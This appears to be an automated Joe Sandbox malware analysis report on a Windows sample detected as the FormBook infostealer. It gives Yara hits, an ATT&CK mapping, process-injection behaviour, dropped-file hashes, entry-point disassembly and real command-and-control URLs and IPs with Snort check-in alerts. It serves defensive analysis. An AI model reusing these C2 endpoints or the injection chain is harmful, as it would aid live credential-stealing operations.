          Source: Yara matchFile source: 1.2.rlpjf.exe.f70000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.0.rlpjf.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.rlpjf.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.rlpjf.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.rlpjf.exe.f70000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.rlpjf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.rlpjf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.rlpjf.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.rlpjf.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.rlpjf.exe.f70000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts12
          Native API          		1
          DLL Side-Loading          		612
          Process Injection          		1
          Rootkit          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Credential API Hooking          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts1
          DLL Side-Loading          		2
          Virtualization/Sandbox Evasion          		1
          Input Capture          		251
          Security Software Discovery          		Remote Desktop Protocol1
          Input Capture          		Exfiltration Over Bluetooth1
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)612
          Process Injection          		Security Account Manager2
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Archive Collected Data          		Automated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Deobfuscate/Decode Files or Information          		NTDS2
          Process Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer12
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script3
          Obfuscated Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Software Packing          		Cached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          DLL Side-Loading          		DCSync113
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 635151 Sample: lamsddre43321.exe Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 45 Snort IDS alert for network traffic 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 5 other signatures 2->51 10 lamsddre43321.exe 19 2->10         started        process3 file4 29 C:\Users\user\AppData\Local\Temp\rlpjf.exe, PE32 10->29 dropped 13 rlpjf.exe 10->13         started        process5 signatures6 59 Multi AV Scanner detection for dropped file 13->59 61 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 13->61 63 Tries to detect virtualization through RDTSC time measurements 13->63 65 Injects a PE file into a foreign processes 13->65 16 rlpjf.exe 13->16         started        process7 signatures8 37 Modifies the context of a thread in another process (thread injection) 16->37 39 Maps a DLL or memory area into another process 16->39 41 Sample uses process hollowing technique 16->41 43 Queues an APC in another process (thread injection) 16->43 19 msiexec.exe 16->19         started        22 explorer.exe 16->22 injected process9 dnsIp10 53 Modifies the context of a thread in another process (thread injection) 19->53 55 Maps a DLL or memory area into another process 19->55 25 cmd.exe 1 19->25         started        31 www.nzyyen.com 154.221.90.236, 49759, 80 DXTL-HKDXTLTseungKwanOServiceHK Seychelles 22->31 33 www.higginsuotdoors.com 22->33 35 2 other IPs or domains 22->35 57 System process connects to network (likely due to code injection or exploit) 22->57 signatures11 process12 process13 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          lamsddre43321.exe43%VirustotalBrowse
          lamsddre43321.exe39%ReversingLabsWin32.Trojan.Injexa

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\rlpjf.exe37%ReversingLabsWin32.Trojan.Jaik

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.0.rlpjf.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.rlpjf.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.rlpjf.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.rlpjf.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.rlpjf.exe.f70000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.higginsuotdoors.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          www.rebelmvmt.com/t23s/4%VirustotalBrowse
          www.rebelmvmt.com/t23s/100%Avira URL Cloudmalware
          https://www.higginsuotdoors.com/t23s/?EJETzlAX=cEalcOUlgQXel0kK38lb//BaRXxUeEtKEp5M3r3CI2ociZMEyQ/3X0%Avira URL Cloudsafe
          http://www.nzyyen.com/t23s/?EJETzlAX=iH1VF/JK30KFHZEdKguaUIUWolCdP6M64DY2HrkJBnwp9nXzsO9KixAtEUEE76WvBmG1&8ptH=IbZdvJCPXDLToZQ100%Avira URL Cloudmalware
          http://www.higginsuotdoors.com/t23s/?EJETzlAX=cEalcOUlgQXel0kK38lb//BaRXxUeEtKEp5M3r3CI2ociZMEyQ/3XnDT9zdGB1sTbUxM&8ptH=IbZdvJCPXDLToZQ0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.nzyyen.com
          		154.221.90.236
          		truetrue
            		unknown
            website-rendering.jouwweb.nl
            		35.204.150.5
            		truefalse
              		high
              www.higginsuotdoors.com
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              www.rebelmvmt.com/t23s/true
              • 4%, Virustotal, Browse
              • Avira URL Cloud: malware
              		low
              http://www.nzyyen.com/t23s/?EJETzlAX=iH1VF/JK30KFHZEdKguaUIUWolCdP6M64DY2HrkJBnwp9nXzsO9KixAtEUEE76WvBmG1&8ptH=IbZdvJCPXDLToZQtrue
              • Avira URL Cloud: malware
              		unknown
              http://www.higginsuotdoors.com/t23s/?EJETzlAX=cEalcOUlgQXel0kK38lb//BaRXxUeEtKEp5M3r3CI2ociZMEyQ/3XnDT9zdGB1sTbUxM&8ptH=IbZdvJCPXDLToZQfalse
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://www.higginsuotdoors.com/t23s/?EJETzlAX=cEalcOUlgQXel0kK38lb//BaRXxUeEtKEp5M3r3CI2ociZMEyQ/3Xmsiexec.exe, 0000000F.00000002.541916856.00000000059BF000.00000004.10000000.00040000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              154.221.90.236
              		www.nzyyen.comSeychelles
              		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
              35.204.150.5
              		website-rendering.jouwweb.nlUnited States
              		15169GOOGLEUSfalse

              General Information

              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:635151
              Start date and time: 27/05/202215:54:112022-05-27 15:54:11 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 10m 1s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:lamsddre43321.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:30
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@10/4@2/2
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 69.5% (good quality ratio 63.9%)
              • Quality average: 73.5%
              • Quality standard deviation: 31.3%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Adjust boot time
              • Enable AMSI

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
              • Not all processes where analyzed, report is missing behavior information

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Temp\nsrD708.tmp

              Download File
              Process:C:\Users\user\Desktop\lamsddre43321.exe
              File Type:data
              Category:dropped
              Size (bytes):335303
              Entropy (8bit):7.522231151776849
              Encrypted:false
              SSDEEP:6144:QcS87ZW3O8lg0/tMBZmbZ+zpvncW/sSGg:9jqgi6ZmUcW/sS
              MD5:800972B7F755FD89A742BF3953AB5889
              SHA1:708375BDFF9C6250EE4CE95659230BD7C2249114
              SHA-256:0B7D7E2F43697DF29548A389E94CAB868E41D3D68B1630985334B8F5B0843B4E
              SHA-512:3A91EDDB6571522B91C26EC94AFFACB31FD0B50C611A558FB6E7DBCD46A56E491ABC752865832BA07C456D6FECB69C7EDA9D4BA9900C7FB9E576597B7686257F
              Malicious:false
              Reputation:low
              Preview:........,...................R...............................................................................................................................................................................................................................................................B...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\ojshmy

              Download File
              Process:C:\Users\user\Desktop\lamsddre43321.exe
              File Type:data
              Category:dropped
              Size (bytes):5083
              Entropy (8bit):6.145719793996354
              Encrypted:false
              SSDEEP:96:lUdu9pigKyb0mZBbCa8b6SeNK5pLzej2lCrCVhWt7dKYN7d+t:7HhRb0mrCZb6SaK5pXej2lCrCVhGJKYS
              MD5:EA71823F325F2B7CBCB947DA55ADD72D
              SHA1:EA3B50837539A67326169C6DBAF73A98D142307C
              SHA-256:B7C4A59BF353D515F295B2934D3E51D391F5BFEC036275CA709A22C8AC3C4E3A
              SHA-512:8AC9072989E91E6C6147BA4E26453392774195273059DA88A55F435B9A7AFDA94C70AB5A1B2FB3FCBDB7610A158B9E7197F26F6B0A4B5086CC5AD1ECDBA89065
              Malicious:false
              Reputation:low
              Preview:.DPHH........%.HK.."KW..K.."KW...%.H...pHHH.%.H.5L.5X......HHH.......5L.5X......HHH.......5L.5X......HHH.......5L.5X......HHH.......=XD2~.P /.GG.L.........X.Dw..............D.w..X!.....G...D.......%....w.HHHH.DdE.o%..5.!.5...5.. .5..!.5...5...4X#..L.#....h.I5..5.....PKE...G%..HHHH..dDgHHH.DdM..%...........LH....K.."KW....P.H..L7h..P.H..X.T....D........P.H...P.I........LH0R..;.6FHH.0FHH.TH0"..;.(FHH..FHH.PH0M..;..FHH..FHH.PH...pK.."KW.....XHHH.......=.H4R....HH..................EHH.4...P..P!/.H..M...M......P!..H..M...M..F.P /.H..E..0"..;..IHH..........K.....5P.........=.H4B.%.H.C...IHHH.....DH....K.."KW.....pHHH.......=.H4R....HH..................DHH.K..HHH..P..P!/.H..M...M...L..P!..H..M...M...X..P!....M...M...Tw..P./.G..U...U......P!..F..M...M..E.P /.H..E..0R..;..HHH..........=`H4P.....`.I.S.5`.5T.5X.5L.5P.........=.H4B.%.H.C...IHHH.....TH...\...XHHH.......=.H4R....HH..................GHH.4...P..P!/.H..M...M...L..P!..H..M...M..F.P /.H..E..0M..;.eHHH..l.......J.5L.5P..

              C:\Users\user\AppData\Local\Temp\rlpjf.exe

              Download File
              Process:C:\Users\user\Desktop\lamsddre43321.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):134144
              Entropy (8bit):6.412192893603871
              Encrypted:false
              SSDEEP:1536:KCTOG+x8+YaGDARvmJVBqNvnlajcCOO0LdXU8JiA1OyDJ6zqjzswa+98qSIJnXSC:ufbnR6BqNvncvhwaz2swteq4iG5slD
              MD5:FB06AEE14DBF93907437AB4372B1BBDE
              SHA1:E29879A2398E6CC9C26D81AAD9FF714E8D69A9A1
              SHA-256:C27274F1B6814483746D398A5DDAB15CBAC70E3F7AE14DA4D834FCD34DAC7EDA
              SHA-512:48D409A4C64A9858FB7BC3B84DAE53CB92D63953B983D69C0E6087944B9A155207A24306D520DF090C8ECDDED4875ADAD2D7C9BFD9F8E3AA7037B0C0AB3A1AE1
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 37%
              Reputation:low
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(.}c{.}c{.}c{./.{.}c{./.{.}c{./.{.}c{(.bz.}c{.}b{.}c{y.gz.}c{y..{.}c{y.az.}c{Rich.}c{........................PE..L...u..b..........................................@..........................`............@..........................................@.......................P..........T...............................@............................................text...5........................... ..`.rdata..>N.......P..................@..@.data....1..........................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\w0d2withwb5vmnwyqdte

              Download File
              Process:C:\Users\user\Desktop\lamsddre43321.exe
              File Type:data
              Category:dropped
              Size (bytes):189439
              Entropy (8bit):7.99132508951707
              Encrypted:true
              SSDEEP:3072:PTaHGxZSyXV9CwLp76J3O8jPRgtaDzWlTH3bwnfMByJH27mdtZPko8:vS87ZW3O8lg0/tMBZmbZU
              MD5:B306FC57D1FB9077FB2BF2BAD4CC39DD
              SHA1:480727033A7F1AEF1E5101CBB49FCEB49DB2F2AB
              SHA-256:A282B6CE83F9E19B1236F8181299E75033E408531C0390D8571840DA870EF4F4
              SHA-512:97E743B9C79EB7377EF12DE789479E52F74AB97C8960274487CBA0D7869F4B241C2F6DFB657C72F6D90026290C93730C47A1E5389FA33EDD49D7578C6CFD7461
              Malicious:false
              Reputation:low
              Preview:hN......Kv`U..}.hV3.<..g.@.m[..z.PPE...eR. .U.y.+.e!....D)....Ztx.V...x..4..\.x....*<.S....A...c.eu.M;.....v.@X.^...>.t....`..,..A.Oq..~.2....,...u..m....1b%.]....3....bO...@.....'..H\#..".2v?q..\,..(..;.#W%...m..6...dh....&Y...R.L...#.$.I?...._...V.....F~....?C.3..6....8...z..PE2..eRs .y.y.+.el....D).P..Z5..2.........>.+...-..I......../1.9..i,8.9..}.CV.. ....>.t....h%....\Mwj]/.f.`.........^....(1....=;...?)@6]O...@...../H\#.....qxKN!..(..;..W....H.sQ.P.dh....&9/>.RCL....#.$.I?....'...V......K~!.....?9.3...6....S...z.PPE...eR. .U.y.+.e!....D).P..Z5..2.........>.+...-..I......../1.9..i,8.9..}.CV.. ....>.t....h%....\Mwj]/.f.`.........^....(1....=;...?)@6]O...@.....'..H\#.."..p.qx.!..(..;..W....H..Q...dh....&9/>.RCL....#.$.I?....'...V......K~!.....?9.3...6....S...z.PPE...eR. .U.y.+.e!....D).P..Z5..2.........>.+...-..I......../1.9..i,8.9..}.CV.. ....>.t....h%....\Mwj]/.f.`.........^....(1....=;...?)@6]O...@.....'..H\#.."..p.qx.!..(..;..W....H..Q...dh....&

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.940776506304337
              TrID:
              • Win32 Executable (generic) a (10002005/4) 92.16%
              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:lamsddre43321.exe
              File size:278417
              MD5:b1fcf52deb6f04ef0f898c9938f26920
              SHA1:42d8b684ff7b293c0d8ad5de6f67d14d17c0b353
              SHA256:8535282c1740725ecf68a65e9ce582a5fe28db4ffcfcd07e6b1516d62cc9dc60
              SHA512:5b03a744b7642085c65091b7d68a2833c89cc0040246630e5714ff30cba7c19ae8c02611635d124b4e92532ff47d1020712773156723454c330cee4bc1c5a368
              SSDEEP:6144:B0Y1JrmXdnF2ThJWmbKKCaSZ+VhO3BmIVKi/oM:lJrmXBF2ThEKKKpSoO3Q2z1
              TLSH:544413003DC642BAEA9B183017EBB3EA29756320962763771B845F3EFD217DB9D050C9
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........qJ...$...$...$./.{...$...%.;.$.".y...$..3....$.f."...$.Rich..$.........................PE..L.....iF.................Z.........

              File Icon

              Icon Hash:b2a88c96b2ca6a72

              Static PE Info

              General

              Entrypoint:0x4032fa
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:
              Time Stamp:0x4669CEB6 [Fri Jun 8 21:48:38 2007 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:55f3dfd13c0557d3e32bcbc604441dd3

              Entrypoint Preview

              Instruction
              sub esp, 00000180h
              push ebx
              push ebp
              push esi
              xor ebx, ebx
              push edi
              mov dword ptr [esp+18h], ebx
              mov dword ptr [esp+10h], 00409170h
              xor esi, esi
              mov byte ptr [esp+14h], 00000020h
              call dword ptr [00407030h]
              push ebx
              call dword ptr [00407278h]
              mov dword ptr [00423FD4h], eax
              push ebx
              lea eax, dword ptr [esp+34h]
              push 00000160h
              push eax
              push ebx
              push 0041F4E8h
              call dword ptr [00407154h]
              push 0040922Ch
              push 00423720h
              call 00007FF94D2938F8h
              call dword ptr [004070B4h]
              mov edi, 00429000h
              push eax
              push edi
              call 00007FF94D2938E6h
              push ebx
              call dword ptr [00407108h]
              cmp byte ptr [00429000h], 00000022h
              mov dword ptr [00423F20h], eax
              mov eax, edi
              jne 00007FF94D29115Ch
              mov byte ptr [esp+14h], 00000022h
              mov eax, 00429001h
              push dword ptr [esp+14h]
              push eax
              call 00007FF94D2933D9h
              push eax
              call dword ptr [00407218h]
              mov dword ptr [esp+1Ch], eax
              jmp 00007FF94D2911B5h
              cmp cl, 00000020h
              jne 00007FF94D291158h
              inc eax
              cmp byte ptr [eax], 00000020h
              je 00007FF94D29114Ch
              cmp byte ptr [eax], 00000022h
              mov byte ptr [esp+14h], 00000020h
              jne 00007FF94D291158h
              inc eax
              mov byte ptr [esp+14h], 00000022h
              cmp byte ptr [eax], 0000002Fh
              jne 00007FF94D291185h
              inc eax
              cmp byte ptr [eax], 00000053h
              jne 00007FF94D291160h

              Rich Headers

              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x73a00xb4.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x900.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x70000x288.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x59ac0x5a00False0.668142361111data6.45807821776IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .rdata0x70000x117a0x1200False0.4453125data5.17513527374IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x90000x1afd80x400False0.6015625data4.98110806401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .rsrc0x2c0000x9000xa00False0.409375data3.94448786242IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              RT_ICON0x2c1900x2e8dataEnglishUnited States
              RT_DIALOG0x2c4780x100dataEnglishUnited States
              RT_DIALOG0x2c5780x11cdataEnglishUnited States
              RT_DIALOG0x2c6980x60dataEnglishUnited States
              RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
              RT_MANIFEST0x2c7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

              Imports

              DLLImport
              KERNEL32.dllSetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, CreateFileA, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, CloseHandle, ExitProcess, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
              USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
              SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
              ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
              VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              192.168.2.3154.221.90.23649759802031449 05/27/22-15:57:04.008947TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.3154.221.90.236
              192.168.2.3154.221.90.23649759802031453 05/27/22-15:57:04.008947TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.3154.221.90.236
              192.168.2.3154.221.90.23649759802031412 05/27/22-15:57:04.008947TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.3154.221.90.236

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
